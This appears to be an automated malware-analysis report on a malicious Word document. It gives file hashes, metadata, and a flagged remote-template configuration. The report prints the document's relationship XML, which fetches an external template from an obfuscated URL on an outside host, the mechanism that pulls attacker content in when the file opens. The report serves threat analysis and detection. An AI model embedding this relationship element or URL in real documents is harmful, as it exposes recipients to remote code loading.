984ae4f139b7da1574a57501061e1eff

MS Word Document
|
MD5: 984ae4f139b7da1574a57501061e1eff
|
Size: 829.07 KB
|
application/msword

Infection Chain

Summary by MalvaGPT

Characteristics

Hash	Hash Value
MD5	984ae4f139b7da1574a57501061e1eff
Sha1	e9704ce3abcd5740f6e61bde877a14137704366a
Sha256	b82179a96d47de86e60ba65ca7ce97f6424f08e637c5e4127c6c08021c417d8f
Sha384	c1e025f5fda32a025eda9193af0a0d715930a08af28688523856cafa49cd57b4911ccd44a75b95e735d6b5a29d245cde
Sha512	e29f9b5f4fcd1eedaef4844ea1f9cdc458fbfdcaf182a1db18018ab42ce884e02ea72aa4176bedec7f404a74965b5caf1d86624ecf446a21289e146a5b94e21f
SSDeep	24576:9hsOQGbeAGQQ+xJQ42fADu2KZSlj9PWbLt:9h1QGbRGHVklJPgLt
TLSH	500523D23C8991A2D1A2D8B25F9E71B990E5C397401D8B5ED7756F2C05E48F8323FA83

File Structure

Malware Configuration - Remote Template

Config. Field0	Value
Target	https://／＼／＼／＼／＼／＼／＼／＼／＼／＼@yorl.to/Lmtx?&／＼／＼／＼／＼／＼／＼／＼／＼／＼／＼
Path	settings.xml.rels
XPath	/Relationships/Relationship
Outer XML	<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://／＼／＼／＼／＼／＼／＼／＼／＼／＼@yorl.to/Lmtx?&／＼／＼／＼／＼／＼／＼／＼／＼／＼／＼" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Informations

Name0	Value
CONTENTS	1.4
CONTENTS	D:20251009073557-05'00'
CONTENTS	KM_C450i
CONTENTS	D:20251009082612-04'00'
CONTENTS	SKM_C450i25100907350
CONTENTS	KONICA MINOLTA bizhub C450i
CONTENTS	D:20251009073557-05'00'
CONTENTS	KM_C450i
CONTENTS	D:20251009082612-04'00'
CONTENTS	KONICA MINOLTA bizhub C450i
CONTENTS	SKM_C450i25100907350
CONTENTS	1.4
CONTENTS	D:20250922084949+01'00'
CONTENTS	Adobe Photoshop 21.2 (Windows)
CONTENTS	D:20250922090806+01'00'
CONTENTS	Adobe Photoshop for Windows -- Image Conversion Plug-in
CONTENTS	D:20250922084949+01'00'
CONTENTS	Adobe Photoshop 21.2 (Windows)
CONTENTS	D:20250922090806+01'00'
CONTENTS	Adobe Photoshop for Windows -- Image Conversion Plug-in

Artefacts

Name0	Value
Remote Template - Highly Suspicious	https://／＼／＼／＼／＼／＼／＼／＼／＼／＼@yorl.to/Lmtx?&／＼／＼／＼／＼／＼／＼／＼／＼／＼／＼

984ae4f139b7da1574a57501061e1eff (829.07 KB)